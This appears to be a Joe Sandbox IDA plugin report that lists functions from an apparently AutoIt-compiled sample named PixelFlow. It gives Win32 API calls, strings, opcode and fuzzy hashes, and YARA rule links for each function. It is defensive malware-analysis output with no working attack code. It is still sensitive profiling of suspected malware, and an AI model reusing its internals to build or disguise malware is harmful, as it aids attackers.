Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: e216ef018c9b5aca08d08b4dad5a010cd2a3fc6117ed682eaa2eccc47e9bd87e
Instruction ID: 73081da6eab4fa5b4ac689018654b905331e6c865080257989392cd239acf850
Opcode Fuzzy Hash: e216ef018c9b5aca08d08b4dad5a010cd2a3fc6117ed682eaa2eccc47e9bd87e
Instruction Fuzzy Hash: ADF082B25443557FF3502B61AC89FBB3A5EEB08750F00206DBB18D55A1D7715D00CFA8

Function 00667002 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0066700E

Part of subcall function 00667AEC: _memset.LIBCMT ref: 00667B21

_memmove.LIBCMT ref: 00667031
_memset.LIBCMT ref: 0066703E
LeaveCriticalSection.KERNEL32(?), ref: 0066704E

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 8a6d019ef18ad5050dad8a39ebb271f95e454ba5022ae0b226de54aac9afeb84
Instruction ID: 9bda7e5e1c55208071b52adfda807e673798c01bcbf7ad03a59cd77f96cdb8c9
Opcode Fuzzy Hash: 8a6d019ef18ad5050dad8a39ebb271f95e454ba5022ae0b226de54aac9afeb84
Instruction Fuzzy Hash: 52F0F47A100114AFDF416F55EC85E4ABB2AEF45360F08C055FE089F22BC771A911DBB5

Function 0068C13F Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 006016CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00601729
Part of subcall function 006016CF: SelectObject.GDI32(?,00000000), ref: 00601738
Part of subcall function 006016CF: BeginPath.GDI32(?), ref: 0060174F
Part of subcall function 006016CF: SelectObject.GDI32(?,00000000), ref: 00601778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0068C163
LineTo.GDI32(00000000,?,?), ref: 0068C170
EndPath.GDI32(00000000), ref: 0068C180
StrokePath.GDI32(00000000), ref: 0068C18E

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 564502cac5c16cf3997a1da4d00e1cc59aef964a6947111a3d266f49afca03e9
Instruction ID: 5cd67fff92b46d1446d0fcc80e6fc5affcac4b4c0f897b8696999fad2c41c3d6
Opcode Fuzzy Hash: 564502cac5c16cf3997a1da4d00e1cc59aef964a6947111a3d266f49afca03e9
Instruction Fuzzy Hash: 69F0B832046229BAEB122F90AC0EFDE3F6BAF06320F084101FA10650E2C3B54561DBA9

Function 0065A835 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0065A852
GetWindowThreadProcessId.USER32(?,00000000), ref: 0065A865
GetCurrentThreadId.KERNEL32 ref: 0065A86C
AttachThreadInput.USER32(00000000), ref: 0065A873

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 5a20819cc995565bc2870f59e14887d87138843c2a0472485a2ea232d77468ef
Instruction ID: 00aac1e54d994a71a32b9bff76a7595e45c5df42b7f5a0a498869e48a7d76a9a
Opcode Fuzzy Hash: 5a20819cc995565bc2870f59e14887d87138843c2a0472485a2ea232d77468ef
Instruction Fuzzy Hash: 2EE06D32101228BAFB201FA2DC0CEDB3F5EEF217A2F008122F90985460C771C955CBE0

Function 006025F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0060260D
SetTextColor.GDI32(?,000000FF), ref: 00602617
SetBkMode.GDI32(?,00000001), ref: 0060262C
GetStockObject.GDI32(00000005), ref: 00602634
GetWindowDC.USER32(?,00000000), ref: 0063C0F4
GetPixel.GDI32(00000000,00000000,00000000), ref: 0063C101
GetPixel.GDI32(00000000,?,00000000), ref: 0063C11A
GetPixel.GDI32(00000000,00000000,?), ref: 0063C133
GetPixel.GDI32(00000000,?,?), ref: 0063C153
ReleaseDC.USER32(?,00000000), ref: 0063C15E

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 4eedf282c36f64e2b5b97ae9e1d2c54da8de298b09392fefdc66ba3994f01aab
Instruction ID: 66642ee1bbac4bf035dd70bb9682a291993cea1599f7c5d54c4bd18573ec50aa
Opcode Fuzzy Hash: 4eedf282c36f64e2b5b97ae9e1d2c54da8de298b09392fefdc66ba3994f01aab
Instruction Fuzzy Hash: 8AE06D32540244AFEB215FA8AC0DBE83B26EB16332F048367FA69580E187724980DB52

Function 00659113 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0065911C
OpenThreadToken.ADVAPI32(00000000,?,?,?,00658CE7), ref: 00659123
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00658CE7), ref: 00659130
OpenProcessToken.ADVAPI32(00000000,?,?,?,00658CE7), ref: 00659137

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 98cd503dc74ba0bc57d8bb4b61dafe541a58478c7f131992ae11ee4991391e1d
Instruction ID: 6a575c5ec15d7e7111d2edf27f6092d2b9ea866c5b25ae9cb57ac9c6cdc57a72
Opcode Fuzzy Hash: 98cd503dc74ba0bc57d8bb4b61dafe541a58478c7f131992ae11ee4991391e1d
Instruction Fuzzy Hash: 7DE08636601222DFE7601FB0AE0DF963B6EDF58796F104819F689C9050E6348545CB60

Function 006405A9 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 006405A9
GetDC.USER32(00000000), ref: 006405B3
GetDeviceCaps.GDI32(00000000,0000000C), ref: 006405D3
ReleaseDC.USER32(?), ref: 006405F4

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 2491b4cfb028c31c0dab6511d1615a086570828a364fee80d227f87c8376b4f3
Instruction ID: 87b0b448b21c2c14a4fffa3060ee506c570d7069a04f05db342194f2daae766e
Opcode Fuzzy Hash: 2491b4cfb028c31c0dab6511d1615a086570828a364fee80d227f87c8376b4f3
Instruction Fuzzy Hash: 07E01AB2800204EFEB419F64D808A5E7BFBEF8C310F10840AF95AE7650CB7895529F50

Function 006405BD Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 006405BD
GetDC.USER32(00000000), ref: 006405C7
GetDeviceCaps.GDI32(00000000,0000000C), ref: 006405D3
ReleaseDC.USER32(?), ref: 006405F4

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 948cb668b82fc3d681cfed53504516bfdd6d83aa44ea4ec8123275d5b7c33a52
Instruction ID: e9d4dc7642c15615eeff1514c6321c4292ee59bb14133a3b8669b7d88a454c4d
Opcode Fuzzy Hash: 948cb668b82fc3d681cfed53504516bfdd6d83aa44ea4ec8123275d5b7c33a52
Instruction Fuzzy Hash: 0DE01AB2800204EFDB519F64D80865E7BFAAF8C310F10840AF959E7650CB7895528F50

Function 0067B354 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 0067B460

Strings

xrl, xrefs: 0067B4C2
xrl, xrefs: 0067B496

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: __itow_s
String ID: xrl$xrl
API String ID: 3653519197-1954299954
Opcode ID: ba053379c306c907dd43c996702d9c08905519f65f08e116940cb114441faec7
Instruction ID: f23857e5f183c766afc733b10eb84ccebc9786ba99ac9dd2518b465bc4910bb4
Opcode Fuzzy Hash: ba053379c306c907dd43c996702d9c08905519f65f08e116940cb114441faec7
Instruction Fuzzy Hash: 1FB16D70A00109AFDB14DF54C891EFABBBAEF58300F14D05DFA499B291EB71EA81CB54

Function 0065BC6F Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0065BE3A

Strings

AutoIt3GUI, xrefs: 0065BDB2
Container, xrefs: 0065BDB7

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 779e0f5512f4aca3067ec97b9748d2888b26aba45db9e5cbe925f27f013118c0
Instruction ID: 1187eb145453989c24fcbafa07203657c091591e8a79379e2c583977cb2eeeb5
Opcode Fuzzy Hash: 779e0f5512f4aca3067ec97b9748d2888b26aba45db9e5cbe925f27f013118c0
Instruction Fuzzy Hash: 5D9149B0200601AFDB64CF64C885AAABBFAFF48711F14856DF90ACB791DB71E845CB50

Function 0066B45C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0061436A: _wcscpy.LIBCMT ref: 0061438D

Part of subcall function 00604D37: __itow.LIBCMT ref: 00604D62
Part of subcall function 00604D37: __swprintf.LIBCMT ref: 00604DAC

__wcsnicmp.LIBCMT ref: 0066B4DD
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0066B5A6

Strings

LPT, xrefs: 0066B4D7

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: f9d8927e2334fd3ec953299887fe64849c6a1fddaae0c6e91723c5cca642fd8a
Instruction ID: 8b552a0c6c8aebeb6f28b4c6b5ded42c28fafc2e7ee207fbcb560ca5ebb255d9
Opcode Fuzzy Hash: f9d8927e2334fd3ec953299887fe64849c6a1fddaae0c6e91723c5cca642fd8a
Instruction Fuzzy Hash: CF615D75A00215EFDB18DF98C891EEEB7B6AB48310F144059F916EB391DB70AE81CB94

Function 00646FF4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0064709B
_memmove.LIBCMT ref: 006470F5

Strings

#Va, xrefs: 0064716F, 0064CA4C, 0064CA68

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _memmove
String ID: #Va
API String ID: 4104443479-320768695
Opcode ID: e70f7e64f64c5ca8ec3fb8cbc0ab727890fd1ce928987d6ccf171c7bef058ee8
Instruction ID: 7e5802fff9daf64620dbec134c4addf11d3b55cf3c094a8cfa30bd63aa396170
Opcode Fuzzy Hash: e70f7e64f64c5ca8ec3fb8cbc0ab727890fd1ce928987d6ccf171c7bef058ee8
Instruction Fuzzy Hash: 71517BB0A016099FDF64CF68C880AEEBBF2FF44314F248529E85AD7350E731A995CB51

Function 0060E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0060E01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 0060E037

Strings

@, xrefs: 0060E02B

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 3c8dcf7e282d362a45c4ed7ca75cf6c7e9cd1f8709a2b73d8f3da0d20f3c39fa
Instruction ID: 3e7958be444ee8b00e9a53e5dff0cc6deb7f9e912fdf8dd324669f9b7757678f
Opcode Fuzzy Hash: 3c8dcf7e282d362a45c4ed7ca75cf6c7e9cd1f8709a2b73d8f3da0d20f3c39fa
Instruction Fuzzy Hash: DE5158B14087459BE364AF50E886BAFBBE9FF84314F41484DF2D9411A1DF709529CB1A

Function 0063EBD6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0063EBE1

Strings

Dtl, xrefs: 006057DC
Dtl, xrefs: 00605661

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ClearVariant
String ID: Dtl$Dtl
API String ID: 1473721057-3066943355
Opcode ID: 6bae359cd80908456746e2a9bfad566334650854ff12d79503aa900c3a3c944e
Instruction ID: b685dcb302fccc618e739d10c2d4b0541236f1efe0e70b0e21566dc0a13e86b5
Opcode Fuzzy Hash: 6bae359cd80908456746e2a9bfad566334650854ff12d79503aa900c3a3c944e
Instruction Fuzzy Hash: 63410678648601CFD758CF08C480A6BBBE3BB98350F64885DE8868B3A1D775E881DF91

Function 00672A3E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00672A4E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00672A84

Strings

|, xrefs: 00672A55

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: cfa3dbc6c617c96b372decc34439954ecc99b79c2571f3e1078df141dbab5701
Instruction ID: 9668f6849353d6c07786b4fb667fa7288b4ade22f14ea290c3d161338c62ac51
Opcode Fuzzy Hash: cfa3dbc6c617c96b372decc34439954ecc99b79c2571f3e1078df141dbab5701
Instruction Fuzzy Hash: 77314C71C00119ABCF41EFA0CC85AEEBFBAFF09304F144019FD14AA266EB315A56CB54

Function 00686E50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00686F04
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00686F40

Strings

static, xrefs: 00686EA0

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 33a293cb972917932bb32e922182f0b64186812429e9f8db5c373c938bff1286
Instruction ID: e731d44d1a460acb78d1bd26fc42b79387cff0f0690a0cd44eaf5083b5f26c46
Opcode Fuzzy Hash: 33a293cb972917932bb32e922182f0b64186812429e9f8db5c373c938bff1286
Instruction Fuzzy Hash: 58317E71100604AEEB10AF64DC81BFB73AAFF88764F109619FA9587290DB31AC81DB64

Function 00662EB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00662F24
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00662F5F

Strings

0, xrefs: 00662F1D

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 813d834cba169c45fd785ad9347565acac05e24a9152ec103d57e751c13275f3
Instruction ID: 5b9ef4facb86623fd55b70be92695ae83215142c7333111e27c054f461614a4b
Opcode Fuzzy Hash: 813d834cba169c45fd785ad9347565acac05e24a9152ec103d57e751c13275f3
Instruction Fuzzy Hash: 6331E632A40607AFEB249F48D955BEEBBFAEF05350F14001DED85D62A0D7709A44DB51

Function 00686AC1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00686B4E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00686B59

Strings

Combobox, xrefs: 00686B1B

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: c22e74daad0e50358acf455bd8381a4fdf7fc3a57b5dea5e75105506807c2cea
Instruction ID: 9ed5f5e91f5d814a4287056af2d8beb31101592508bee5774f9063bfd19f05f1
Opcode Fuzzy Hash: c22e74daad0e50358acf455bd8381a4fdf7fc3a57b5dea5e75105506807c2cea
Instruction Fuzzy Hash: BD118271300209AFEF15AF54DC91EFB376FEB943A8F114229FA18D7290D6719C618760

Function 0068B18A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 006029E2: GetWindowLongW.USER32(?,000000EB), ref: 006029F3

GetActiveWindow.USER32 ref: 0068B1C3
EnumChildWindows.USER32(?,0068AEA3,00000000), ref: 0068B23D

Strings

g, xrefs: 0068B243

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
